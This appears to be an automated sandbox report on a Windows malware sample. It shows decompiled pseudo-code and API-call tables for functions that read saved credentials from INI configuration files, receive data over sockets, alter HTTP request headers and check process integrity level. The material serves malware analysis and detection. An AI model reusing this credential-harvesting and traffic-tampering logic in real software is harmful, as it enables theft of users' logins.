0x0042246b
0x00422479
0x00422487
0x00422491
0x00422497
0x00422499
0x0042249f
0x004224a5
0x004224a5
0x004224ad
0x004224cc
0x004224df
0x004224f0
0x004224fb
0x004224fd
0x00422503
0x00422509
0x0042250f
0x00422523
0x00422527
0x0042252b
0x0042252e
0x00422535
0x0042253c
0x00422543
0x00422566
0x00422566
0x00422545
0x00422545
0x00422548
0x0042254f
0x00422557
0x0042255c
0x00000000
0x00000000
0x0042255c
0x00422572
0x0042257d
0x00422581
0x00422585
0x0042258f
0x00000000
0x00000000
0x00422591
0x00422591
0x00422591
0x00422595
0x00422597
0x00422597
0x0042259b
0x0042259c
0x004225a4
0x004225af
0x004225bc
0x004225bd
0x004225be
0x004225c1
0x004225c5
0x004225cc
0x004225d1
0x004225d6
0x004225da
0x004225e7
0x004225e9
0x004225e9
0x004225e7
0x004225d6
0x004225a4
0x00422595
0x00422585
0x00422581
0x00422572
0x0042250f
0x004225ec
0x004225f0
0x004225f0
0x004225f4
0x004225f5
0x004225f9
0x004224a5
0x0042260f
0x00422615
0x00422615
0x0042261f
0x0042261f
0x00422626
0x00422630
0x00422630
0x00422636
0x0042263c
0x0042263f
0x0042263f
0x0042263c
0x00000000
0x004223b7
0x004223b7
0x004223c0
0x004223d8
0x004223e9
0x004223f6
0x004223f6
0x004223b5

APIs

PathCombineW.SHLWAPI(?,?,?), ref: 004223A4
HeapAlloc.KERNEL32(?,00000008,00000626,?,00000000,00000001,00000000,?,?), ref: 0042244A
StrStrIA.SHLWAPI(?,?), ref: 004224C2
StrStrIA.SHLWAPI(00000000,?), ref: 004224D5
StrStrIA.SHLWAPI(00000000,?), ref: 004224E6
StrStrIA.SHLWAPI(00000000,?), ref: 004224F9
HeapFree.KERNEL32(?,00000000,00000000), ref: 0042260F
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000001,00000000,?,?), ref: 00422630
CloseHandle.KERNEL32(?,?,00000000,00000001,00000000,?,?), ref: 0042263F

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AllocCloseCombineHandlePathVirtual
String ID:
API String ID: 1843439433-0
Opcode ID: 88398a899154538563f16734129c64393c34f8590b06b6725c7003e37382648a
Instruction ID: ca25dc349efcee8b941a250c8365372b468a1df006bb39ab1b6f66022b87276a
Opcode Fuzzy Hash: 88398a899154538563f16734129c64393c34f8590b06b6725c7003e37382648a
Instruction Fuzzy Hash: 9881F2717043216FD720DF68E980B5BB7E8AB88304F44491EF98097391D7B8ED85CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00419B40, Relevance: 13.7, APIs: 9, Instructions: 204
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00419B40(intOrPtr __esi) {
				signed int _v64;
				short* _v68;
				intOrPtr* _v100;
				intOrPtr _v264;
				void* _v268;
				long _v280;
				char _v284;
				char _v288;
				intOrPtr _v300;
				void* _v304;
				long _v308;
				char _v312;
				void* _v320;
				signed short _v322;
				signed int _v324;
				intOrPtr _v336;
				void* _v340;
				long _v344;
				char _v348;
				void* _v356;
				signed short _v358;
				intOrPtr _v376;
				intOrPtr _v392;
				void* __ebx;
				void* __edi;
				signed int _t50;
				signed int _t53;
				void* _t57;
				signed int _t58;
				short* _t63;
				signed short _t65;
				signed int _t66;
				signed char _t69;
				signed int _t71;
				signed int _t72;
				signed int _t79;
				signed short _t85;
				void* _t99;
				signed int _t102;
				void* _t103;
				signed int _t105;
				intOrPtr _t106;
				char* _t107;
				void* _t108;
				signed int _t109;
				signed int _t110;
				void* _t114;

				_t106 = __esi;
				_t99 = 4;
				_t107 =  &_v288;
				while(1) {
					_t50 =  &_v284;
					_v284 = 0x1e;
					_v280 = 0;
					_v268 = 1;
					_v264 = _t106;
					__imp__#18(0,  &_v268, 0, 0, _t50);
					if(_t50 != 1) {
						break;
					}
					__imp__#16(_t106, _t107, _t99, 0);
					if(_t50 <= 0) {
						break;
					} else {
						_t99 = _t99 - _t50;
						_t107 = _t107 + _t50;
						_t114 = _t99;
						if(_t114 > 0) {
							continue;
						} else {
							if((_t50 & 0xffffff00 | _t114 == 0x00000000) == 0) {
								break;
							} else {
								_t85 = _v324;
								if(_t85 <= 4) {
									break;
								} else {
									_t53 = _t85 & 0x0000ffff;
									if(_t53 == 0) {
										L9:
										E00414C40(_t106, 0x7530, (_v322 & 0x0000ffff) + (_t85 & 0x0000ffff) - 4);
										break;
									} else {
										_t57 = HeapAlloc( *0x42e6d4, 8, _t53 + 4);
										_v320 = _t57;
										if(_t57 != 0) {
											_t102 = (_v324 & 0x0000ffff) - 4;
											__eflags = _t102;
											_t108 = _t57;
											while(1) {
												_t58 =  &_v312;
												_v312 = 0x1e;
												_v308 = 0;
												_v304 = 1;
												_v300 = _t106;
												__imp__#18(0,  &_v304, 0, 0, _t58);
												__eflags = _t58 - 1;
												if(_t58 != 1) {
													break;
												}
												__imp__#16(_t106, _t108, _t102, 0);
												__eflags = _t58;
												if(_t58 <= 0) {
													break;
												} else {
													_t102 = _t102 - _t58;
													_t108 = _t108 + _t58;
													__eflags = _t102;
													if(__eflags > 0) {
														continue;
													} else {
														if(__eflags != 0) {
															_t63 = _v68;
															_t103 = _v356;
															 *((short*)(_t63 + 2)) = _v358;
															 *_t63 = 5;
															 *((char*)(_t63 + 4)) =  *_t103;
															HeapFree( *0x42e6d4, 0, _t103);
															_t65 = _v358;
															__eflags = _t65;
															if(_t65 != 0) {
																_t109 = _v64;
																__eflags = _t109;
																if(_t109 == 0) {
																	L31:
																	_t66 = E00414C40(_t106, 0x7530, _t65 & 0x0000ffff);
																	__eflags = _t109;
																	_t69 = (_t66 & 0xffffff00 | _t109 != 0x00000000) - 0x00000001 & _t66;
																	__eflags = _t69;
																	return _t69;
																} else {
																	_t71 = E004107A0(_t65 & 0x0000ffff);
																	_v356 = _t71;
																	__eflags = _t71;
																	if(_t71 == 0) {
																		_t65 = _v358;
																		goto L31;
																	} else {
																		_t105 = _v358 & 0x0000ffff;
																		_t110 = _t71;
																		while(1) {
																			_t72 =  &_v348;
																			_v348 = 0x1e;
																			_v344 = 0;
																			_v340 = 1;
																			_v336 = _t106;
																			__imp__#18(0,  &_v340, 0, 0, _t72);
																			__eflags = _t72 - 1;
																			if(_t72 != 1) {
																				break;
																			}
																			__imp__#16(_t106, _t110, _t105, 0);
																			__eflags = _t72;
																			if(_t72 <= 0) {
																				break;
																			} else {
																				_t105 = _t105 - _t72;
																				_t110 = _t110 + _t72;
																				__eflags = _t105;
																				if(__eflags > 0) {
																					continue;
																				} else {
																					if(__eflags != 0) {
																						 *_v100 = _v392;
																						goto L29;
																					} else {
																						break;
																					}
																				}
																			}
																			goto L32;
																		}
																		E004107C0(_v376);
																		__eflags = 0;
																		return 0;
																	}
																}
															} else {
																_t79 = _v64;
																__eflags = _t79;
																if(_t79 == 0) {
																	L29:
																	return 1;
																} else {
																	 *_t79 = 0;
																	return 1;
																}
															}
														} else {
															break;
														}
													}
												}
												goto L32;
											}
											HeapFree( *0x42e6d4, 0, _v340);
											__eflags = 0;
											return 0;
										} else {
											_t85 = _v324;
											goto L9;
										}
									}
								}
							}
						}
					}
					L32:
				}
				return 0;
				goto L32;
			}

0x00419b40
0x00419b49
0x00419b4e
0x00419b52
0x00419b54
0x00419b61
0x00419b69
0x00419b6d
0x00419b75
0x00419b79
0x00419b82
0x00000000
0x00000000
0x00419b88
0x00419b90
0x00000000
0x00419b92
0x00419b92
0x00419b94
0x00419b96
0x00419b98
0x00000000
0x00419b9a
0x00419b9f
0x00000000
0x00419ba1
0x00419ba1
0x00419ba9
0x00000000
0x00419bab
0x00419bab
0x00419bb0
0x00419bd1
0x00419be5
0x00000000
0x00419bb2
0x00419bbf
0x00419bc5
0x00419bcb
0x00419bfd
0x00419bfd
0x00419c00
0x00419c02
0x00419c02
0x00419c0f
0x00419c17
0x00419c1b
0x00419c23
0x00419c27
0x00419c2d
0x00419c30
0x00000000
0x00000000
0x00419c36
0x00419c3c
0x00419c3e
0x00000000
0x00419c40
0x00419c40
0x00419c42
0x00419c44
0x00419c46
0x00000000
0x00419c48
0x00419c4d
0x00419c6f
0x00419c7b
0x00419c85
0x00419c8f
0x00419c96
0x00419c99
0x00419c9f
0x00419ca4
0x00419ca7
0x00419cc8
0x00419ccf
0x00419cd1
0x00419d76
0x00419d81
0x00419d86
0x00419d91
0x00419d91
0x00419d9a
0x00419cd7
0x00419cda
0x00419cdf
0x00419ce3
0x00419ce5
0x00419d71
0x00000000
0x00419ceb
0x00419ceb
0x00419cf0
0x00419cf2
0x00419cf2
0x00419cff
0x00419d07
0x00419d0b
0x00419d13
0x00419d17
0x00419d1d
0x00419d20
0x00000000
0x00000000
0x00419d26
0x00419d2c
0x00419d2e
0x00000000
0x00419d30
0x00419d30
0x00419d32
0x00419d34
0x00419d36
0x00000000
0x00419d38
0x00419d3d
0x00419d61
0x00000000
0x00000000
0x00000000
0x00000000
0x00419d3d
0x00419d36
0x00000000
0x00419d2e
0x00419d43
0x00419d48
0x00419d53
0x00419d53
0x00419ce5
0x00419ca9
0x00419ca9
0x00419cb0
0x00419cb2
0x00419d63
0x00419d6e
0x00419cb8
0x00419cb8
0x00419cc5
0x00419cc5
0x00419cb2
0x00000000
0x00000000
0x00000000
0x00419c4d
0x00419c46
0x00000000
0x00419c3e
0x00419c5b
0x00419c61
0x00419c6c
0x00419bcd
0x00419bcd
0x00000000
0x00419bcd
0x00419bcb
0x00419bb0
0x00419ba9
0x00419b9f
0x00419b98
0x00000000
0x00419b90
0x00419bf5
0x00000000

APIs

select.WS2_32 ref: 00419B79
recv.WS2_32(00000104,00000104,00000004,00000000), ref: 00419B88
HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 00419BBF
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00419C27
recv.WS2_32(00000104,00000000,00000100,00000000), ref: 00419C36
HeapFree.KERNEL32(?,00000000,?), ref: 00419C5B
HeapFree.KERNEL32(?,00000000,?), ref: 00419C99
select.WS2_32(00000000,0000001E,00000000,00000000,00000000), ref: 00419D17
recv.WS2_32(00000104,00000000,?,00000000), ref: 00419D26

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heaprecvselect$Free$Alloc
String ID:
API String ID: 3564761155-0
Opcode ID: 6d2e3bcd1284506f033aea8dd3e93245c1328f7143cc7dec781800125d4763d8
Instruction ID: b639df19a86d6785f5c6c8c3fa4ee62ddfa50ad74cf38afee805f889fafc6719
Opcode Fuzzy Hash: 6d2e3bcd1284506f033aea8dd3e93245c1328f7143cc7dec781800125d4763d8
Instruction Fuzzy Hash: D551C3761083406FD3109F15D9849EFB7E9FBD9310F84482EF48587250E379DD8A876A

Uniqueness

Uniqueness Score: -1.00%

Function 00420820, Relevance: 13.7, APIs: 9, Instructions: 192
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00420820(WCHAR* __ecx, signed char* __edx, intOrPtr _a4) {
				short _v524;
				short _v532;
				char _v572;
				short _v584;
				short _v596;
				short _v608;
				short _v616;
				void* _v620;
				int _v624;
				intOrPtr _v628;
				WCHAR* _v632;
				void* __ebx;
				void* __esi;
				WCHAR* _t37;
				long _t43;
				void* _t47;
				void* _t55;
				int _t59;
				WCHAR* _t66;
				void* _t69;
				WCHAR* _t81;
				signed int _t103;
				void* _t106;
				signed char* _t109;
				WCHAR* _t116;
				WCHAR* _t117;
				intOrPtr _t121;
				signed int _t123;
				void* _t125;

				_t81 = __ecx;
				_t125 = (_t123 & 0xfffffff8) - 0x26c;
				_t109 = __edx;
				_t37 = __edx + 0x2c;
				if(_t37 != 0) {
					L1:
					_t103 =  *_t37 & 0x0000ffff;
					if(_t103 == 0x5c || _t103 == 0x2f) {
						_t37 =  &(_t37[1]);
						goto L1;
					}
				}
				if(PathCombineW( &_v524, _t81, _t37) == 0) {
					L28:
					return 1;
				} else {
					if(( *_t109 & 0x00000010) == 0) {
						_t106 = HeapAlloc( *0x42e6d4, 8, 0x20002);
						_v620 = _t106;
						if(_t106 != 0) {
							_t43 = GetPrivateProfileStringW(0, 0, 0, _t106, 0xffff,  &_v532);
							if(_t43 != 0) {
								_t9 = _t43 + 1; // 0x1
								if(E00411F50(_t106, _t9) != 0) {
									_t47 = HeapAlloc( *0x42e6d4, 8, 0xc20);
									_v632 = _t47;
									if(_t47 != 0) {
										_v628 = _t47 + 0x5fa;
										E00424100(0x5c,  &_v616);
										E00424100(0x5d,  &_v596);
										E00424100(0x5e,  &_v584);
										E00424100(0x5f,  &_v608);
										while(1) {
											_t116 = _v632;
											if(GetPrivateProfileStringW(_t106,  &_v616, 0, _t116, 0xff,  &_v532) != 0) {
												_t59 = GetPrivateProfileIntW(_t106,  &_v596, 0x15,  &_v532);
												_v624 = _t59;
												if(_t59 - 1 <= 0xfffe) {
													_t117 =  &(_t116[0xff]);
													if(GetPrivateProfileStringW(_t106,  &_v584, 0, _t117, 0xff,  &_v532) != 0) {
														_t118 =  &(_t117[0xff]);
														if(GetPrivateProfileStringW(_t106,  &_v608, 0,  &(_t117[0xff]), 0xff,  &_v532) != 0) {
															if(E004206D0(_t118, _t106) > 0) {
																_t119 =  &_v572;
																E00424100(0x55,  &_v572);
																_t66 = _v632;
																_push(_v624);
																_push(_t66);
																_push(_t66 + 0x3fc);
																_push(_t66 + 0x1fe);
																_t120 = _v628;
																_t69 = E00411D10(_t119, 0x311, _v628, _t119);
																_t125 = _t125 + 0x14;
																if(_t69 > 0) {
																	_t121 = _a4;
																	if(E00410D70(_t121, _t120, _t69) != 0) {
																		 *((intOrPtr*)(_t121 + 4)) =  *((intOrPtr*)(_t121 + 4)) + 1;
																	}
																}
															}
														}
													}
												}
											}
											_t55 = 0;
											goto L22;
											do {
												do {
													L22:
													_t106 = _t106 + 2;
												} while ( *((short*)(_t106 - 2)) != 0);
												if( *_t106 != 0) {
													goto L24;
												}
												E004107C0(_v632);
												_t106 = _v620;
												goto L27;
												L24:
												_t55 = _t55 + 1;
											} while (_t55 != 1);
										}
									}
								}
							}
							L27:
							HeapFree( *0x42e6d4, 0, _t106);
						}
						goto L28;
					} else {
						E004207B0( &_v532, _a4);
						return 1;
					}
				}
			}

0x00420820
0x00420826
0x0042082e
0x00420830
0x00420836
0x00420838
0x00420838
0x0042083e
0x00420845
0x00000000
0x00420845
0x0042083e
0x00420859
0x00420a54
0x00420a5c
0x0042085f
0x00420862
0x00420892
0x00420894
0x0042089a
0x004208b7
0x004208bb
0x004208c1
0x004208cd
0x004208e1
0x004208e3
0x004208e9
0x004208fd
0x00420901
0x0042090f
0x0042091d
0x0042092b
0x00420930
0x00420930
0x0042094b
0x0042095e
0x00420964
0x0042096e
0x0042097e
0x00420991
0x004209a1
0x004209b4
0x004209c1
0x004209c3
0x004209cc
0x004209d5
0x004209d9
0x004209da
0x004209e1
0x004209e7
0x004209ea
0x004209f4
0x004209f9
0x004209fe
0x00420a02
0x00420a0f
0x00420a11
0x00420a11
0x00420a0f
0x004209fe
0x00420a14
0x004209b4
0x00420991
0x0042096e
0x00420a1a
0x00420a1a
0x00420a1c
0x00420a1c
0x00420a1c
0x00420a1c
0x00420a1f
0x00420a2a
0x00000000
0x00000000
0x00420a3b
0x00420a40
0x00000000
0x00420a2c
0x00420a2c
0x00420a2d
0x00420a1c
0x00420930
0x004208e9
0x004208cd
0x00420a44
0x00420a4e
0x00420a4e
0x00000000
0x00420864
0x0042086d
0x0042087a
0x0042087a
0x00420862

APIs

PathCombineW.SHLWAPI(?,?,?), ref: 00420851
HeapAlloc.KERNEL32(?,00000008,00020002,?,?), ref: 00420890
GetPrivateProfileStringW.KERNEL32 ref: 004208B7
HeapAlloc.KERNEL32(?,00000008,00000C20,?,?), ref: 004208E1
GetPrivateProfileStringW.KERNEL32 ref: 00420947
GetPrivateProfileIntW.KERNEL32 ref: 0042095E
GetPrivateProfileStringW.KERNEL32 ref: 0042098D
GetPrivateProfileStringW.KERNEL32 ref: 004209B0
HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 00420A4E

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$Heap$Alloc$CombineFreePath
String ID:
API String ID: 592523376-0
Opcode ID: d205f53b64e2acda715d4e58a0c22f4f34ab644108092b28765a51d56e244a55
Instruction ID: 29f842666c9642d1e9c20fe462c3a2e781653a8c70ea259202d2c11be5c7cc44
Opcode Fuzzy Hash: d205f53b64e2acda715d4e58a0c22f4f34ab644108092b28765a51d56e244a55
Instruction Fuzzy Hash: 6151B6727003156BD710DB55EC41FBB73E8EB98700F84442EBA54A7292DB78EC45CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB80, Relevance: 13.7, APIs: 9, Instructions: 174
memoryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040BB80(void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				void* _v28;
				void* _v32;
				void* _v48;
				void* _v52;
				char _v76;
				void* _v80;
				void* _v84;
				void* _v88;
				void* _v116;
				long _v120;
				char _v128;
				void* _v132;
				void* _v133;
				void* _v140;
				void* _v148;
				void* _v176;
				void* _v181;
				void* __edi;
				void* __esi;
				signed char _t76;
				signed int _t78;
				void* _t79;
				signed int _t98;
				intOrPtr _t99;
				intOrPtr _t105;
				intOrPtr _t106;
				char _t108;
				char _t114;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t130;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t137;
				intOrPtr* _t140;
				char* _t142;
				char* _t143;
				char* _t144;
				void* _t147;
				void* _t154;
				signed int _t159;
				void* _t161;

				_t161 = (_t159 & 0xfffffff8) - 0x7c;
				_t140 =  &_v76;
				_v120 = 0xffffffff;
				if(E0040B920(_t140, _a4,  *_a8,  *_a12) == 0) {
					L22:
					E00425BD0( &_v76);
					return _v120;
				} else {
					_push(_t140);
					_t76 = E00424ED0();
					_v120 = _t76;
					if((_t76 & 0x00000001) == 0) {
						if((_t76 & 0x00000002) != 0) {
							_t114 = 0;
							 *((char*)(_t161 + 0x13)) = 1;
							if( *((intOrPtr*)(_t161 + 0x7c)) != 1) {
								L9:
								_t142 = _t161 + 0x24;
								E004240C0(0x21, _t142);
								HttpAddRequestHeadersA(_a4, _t142, 0xffffffff, 0xa0000000);
								_t143 =  &_v128;
								E004240C0(0x22, _t143);
								HttpAddRequestHeadersA(_a4, _t143, 0xffffffff, 0x80000000);
								_t144 = _t161 + 0x24;
								E004240C0(0x23, _t144);
								HttpAddRequestHeadersA(_a4, _t144, 0xffffffff, 0x80000000);
							} else {
								_t107 =  *(_t161 + 0x78);
								if(( *( *(_t161 + 0x78)) & 0x00000003) == 0) {
									goto L9;
								} else {
									_t108 = E00426020(_t107,  &_v76);
									_t114 = _t108;
									if(_t114 != 0) {
										_v120 = 1;
									} else {
										 *((char*)(_t161 + 0x13)) = _t108;
									}
								}
							}
							EnterCriticalSection(0x42d3ec);
							if( *((char*)(_t161 + 0x13)) == 0) {
								L13:
								E00425CF0( *((intOrPtr*)(_t161 + 0x80)),  *(_t161 + 0x78));
								if(_t114 != 0) {
									E00413040(_t114);
								}
							} else {
								_t98 = E0040AAF0(_a4);
								if(_t98 == 0xffffffff) {
									goto L13;
								} else {
									_t99 =  *0x42d404; // 0x0
									_t147 = _t98 + _t98 * 8 + _t98 + _t98 * 8 + _t98 + _t98 * 8 + _t98 + _t98 * 8;
									E00425CF0( *((intOrPtr*)(_t147 + _t99 + 0x10)),  *((intOrPtr*)(_t147 + _t99 + 0xc)));
									_t134 =  *0x42d404; // 0x0
									E004107C0( *((intOrPtr*)(_t147 + _t134 + 0x14)));
									_t124 =  *0x42d404; // 0x0
									 *((intOrPtr*)(_t147 + _t124 + 0x14)) = 0;
									_t135 =  *0x42d404; // 0x0
									 *((intOrPtr*)(_t147 + _t135 + 0x1c)) = 0;
									_t105 =  *0x42d404; // 0x0
									 *(_t147 + _t105 + 0x18) = 0xffffffff;
									_t125 =  *0x42d404; // 0x0
									 *(_t147 + _t125 + 0xc) =  *(_t161 + 0x78);
									_t106 =  *0x42d404; // 0x0
									 *((intOrPtr*)(_t147 + _t106 + 0x10)) =  *((intOrPtr*)(_t161 + 0x7c));
									_t137 =  *0x42d404; // 0x0
									 *((intOrPtr*)(_t147 + _t137 + 0x20)) = _t114;
								}
							}
							LeaveCriticalSection(0x42d3ec);
							_t76 =  *(_t161 + 0x18);
						}
						if((_t76 & 0x00000004) != 0) {
							 *_a8 =  *((intOrPtr*)(_t161 + 0x64));
							 *_a12 =  *((intOrPtr*)(_t161 + 0x68));
							EnterCriticalSection(0x42d3ec);
							_t78 = E0040AAF0(_a4);
							if(_t78 != 0xffffffff) {
								_t130 =  *0x42d404; // 0x0
								_t154 = _t78 + _t78 * 8 + _t78 + _t78 * 8 + _t78 + _t78 * 8 + _t78 + _t78 * 8;
								_t79 =  *(_t154 + _t130 + 8);
								if(_t79 != 0) {
									HeapFree( *0x42e6d4, 0, _t79);
								}
								_t131 =  *0x42d404; // 0x0
								 *((intOrPtr*)(_t154 + _t131 + 8)) =  *((intOrPtr*)(_t161 + 0x64));
							}
							LeaveCriticalSection(0x42d3ec);
						}
						goto L22;
					} else {
						SetLastError(0x2f78);
						_v120 = 0;
						E00425BD0(_t140);
						return _v120;
					}
				}
			}

0x0040bb86
0x0040bb9c
0x0040bba0
0x0040bbaf
0x0040bdb6
0x0040bdba
0x0040bdc9
0x0040bbb5
0x0040bbb7
0x0040bbb8
0x0040bbbd
0x0040bbc3
0x0040bbee
0x0040bbf9
0x0040bbfb
0x0040bc04
0x0040bc2a
0x0040bc2a
0x0040bc33
0x0040bc4c
0x0040bc4e
0x0040bc57
0x0040bc6a
0x0040bc6c
0x0040bc75
0x0040bc88
0x0040bc06
0x0040bc06
0x0040bc0d
0x00000000
0x0040bc0f
0x0040bc13
0x0040bc18
0x0040bc1c
0x0040bc24
0x0040bc1e
0x0040bc1e
0x0040bc1e
0x0040bc1c
0x0040bc0d
0x0040bc8f
0x0040bc9a
0x0040bd20
0x0040bd2c
0x0040bd33
0x0040bd37
0x0040bd37
0x0040bca0
0x0040bca3
0x0040bcab
0x00000000
0x0040bcad
0x0040bcb0
0x0040bcb7
0x0040bcc2
0x0040bcc7
0x0040bcd1
0x0040bcd6
0x0040bcde
0x0040bce2
0x0040bce8
0x0040bcec
0x0040bcf1
0x0040bcf9
0x0040bd03
0x0040bd07
0x0040bd10
0x0040bd14
0x0040bd1a
0x0040bd1a
0x0040bcab
0x0040bd41
0x0040bd47
0x0040bd47
0x0040bd4d
0x0040bd5a
0x0040bd64
0x0040bd66
0x0040bd6f
0x0040bd77
0x0040bd79
0x0040bd84
0x0040bd86
0x0040bd8c
0x0040bd97
0x0040bd97
0x0040bda1
0x0040bda7
0x0040bda7
0x0040bdb0
0x0040bdb0
0x00000000
0x0040bbc5
0x0040bbca
0x0040bbd2
0x0040bbda
0x0040bbe9
0x0040bbe9
0x0040bbc3

APIs

Part of subcall function 0040B920: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040B94C
Part of subcall function 0040B920: GetLastError.KERNEL32 ref: 0040B95A
Part of subcall function 0040B920: HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 0040B977
Part of subcall function 0040B920: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040B988

Part of subcall function 00424ED0: EnterCriticalSection.KERNEL32 ref: 00424EF1
Part of subcall function 00424ED0: HeapFree.KERNEL32(?,00000000,?,00000000,00000000), ref: 00424F8E
Part of subcall function 00424ED0: HeapFree.KERNEL32(?,00000000,?,00000000,00000000), ref: 00424FA2
Part of subcall function 00424ED0: LeaveCriticalSection.KERNEL32(0042EE7C), ref: 00424FB5

SetLastError.KERNEL32(00002F78,?), ref: 0040BBCA

Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BEA
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BFD
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C10
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C22
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C35
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C48
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C5A
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C6D

EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040BC8F
LeaveCriticalSection.KERNEL32(0042D3EC,?), ref: 0040BD41
EnterCriticalSection.KERNEL32(0042D3EC,?), ref: 0040BD66
HeapFree.KERNEL32(?,00000000,?), ref: 0040BD97
LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040BDB0

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$CriticalSection$EnterLeave$ErrorInternetLastOptionQuery$Alloc
String ID:
API String ID: 4292770527-0
Opcode ID: acea817ef5eae83ce0a47ad71bdbc41694b00d764553cade411570a922c6010e
Instruction ID: 75202b0bc1f6bc169339f11f2124a4a2e1f758cd914cbba951783f6418e73c76
Opcode Fuzzy Hash: acea817ef5eae83ce0a47ad71bdbc41694b00d764553cade411570a922c6010e
Instruction Fuzzy Hash: 17618E317043019BD724DF29D884A6BB7A5EF88314F94462EF955A73A2C734EC02CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00412A50, Relevance: 13.6, APIs: 9, Instructions: 87
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00412A50() {
				void* _v4;
				long _v8;
				long _v12;
				long _t15;
				char* _t22;
				signed char _t23;
				DWORD* _t25;
				void* _t27;
				void* _t41;

				_t27 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v4) == 0) {
					L15:
					return _t27;
				}
				if(GetTokenInformation(_v4, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L14:
					CloseHandle(_v8);
					goto L15;
				} else {
					_t15 = _v12;
					if(_t15 == 0) {
						goto L14;
					}
					_t41 = HeapAlloc( *0x42e6d4, 8, _t15 + 4);
					if(_t41 == 0) {
						L13:
						goto L14;
					}
					if(GetTokenInformation(_v8, 0x19, _t41, _v12,  &_v12) != 0) {
						_t22 = GetSidSubAuthorityCount( *_t41);
						if(_t22 != 0) {
							_t23 =  *_t22;
							if(_t23 != 0) {
								_t25 = GetSidSubAuthority( *_t41, (_t23 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t27 = 3;
									} else {
										_t27 = 1;
									}
								}
							}
						}
					}
					HeapFree( *0x42e6d4, 0, _t41);
					goto L13;
				}
			}

0x00412a5d
0x00412a67
0x00412b2f
0x00412b35
0x00412b35
0x00412a88
0x00412b23
0x00412b28
0x00000000
0x00412a9d
0x00412a9d
0x00412aa3
0x00000000
0x00000000
0x00412ab8
0x00412abc
0x00412b22
0x00000000
0x00412b22
0x00412ad4
0x00412ad9
0x00412ae1
0x00412ae3
0x00412ae7
0x00412af1
0x00412af9
0x00412b02
0x00412b0d
0x00412b0f
0x00412b04
0x00412b04
0x00412b04
0x00412b02
0x00412af9
0x00412ae7
0x00412ae1
0x00412b1c
0x00000000
0x00412b1c

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,00000000), ref: 00412A5F
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,00000000), ref: 00412A84
GetLastError.KERNEL32(?,?,00000000), ref: 00412A8E
HeapAlloc.KERNEL32(?,00000008,?,00000000,?,?,00000000), ref: 00412AB2
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?,?,?,00000000), ref: 00412AD0
GetSidSubAuthorityCount.ADVAPI32(?,?,?,00000000), ref: 00412AD9
GetSidSubAuthority.ADVAPI32(?,?,?,?,?,00000000), ref: 00412AF1
HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 00412B1C
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00412B28

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

